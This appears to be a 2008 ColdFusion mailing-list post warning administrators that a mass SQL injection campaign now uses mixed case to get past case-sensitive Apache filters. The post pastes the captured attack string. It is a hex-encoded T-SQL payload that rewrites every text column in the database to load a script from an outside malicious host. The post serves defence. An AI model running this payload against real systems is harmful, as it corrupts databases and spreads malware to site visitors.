As an FYI: for those that did use Apache configs to stop this attack, if you did not make sure your check was not case sensitive your being hit again.
I just saw this start coming into our logs this afternoon: Note that DECLARE changed to DeCLARE. Some of the posts I saw for people to modify apache where checking for DECLARE in case sensitive mode. Cheers, It looks like the storm is still trying to rage. Wil Genovese ;[EMAIL PROTECTED](4000);[EMAIL PROTECTED] =CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430 303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F 6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720 616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729 204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320 5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F 63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974 6C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C21 2D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162 6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); On Fri, Aug 15, 2008 at 3:30 PM, Justin Scott <[EMAIL PROTECTED]>wrote: > > But I know all this, I thought the sql injection attack went beyond it, > thanks anyway, Justin. > > Not as far as technique, but it was much larger in scale than most of us > have experience before. Some were getting hit so hard they had to > filter it farther up the chain (IIS, firewall, etc.) but for the > majority of us the standard secure coding methods kept it out. > > > -Justin Scott > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:311056 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
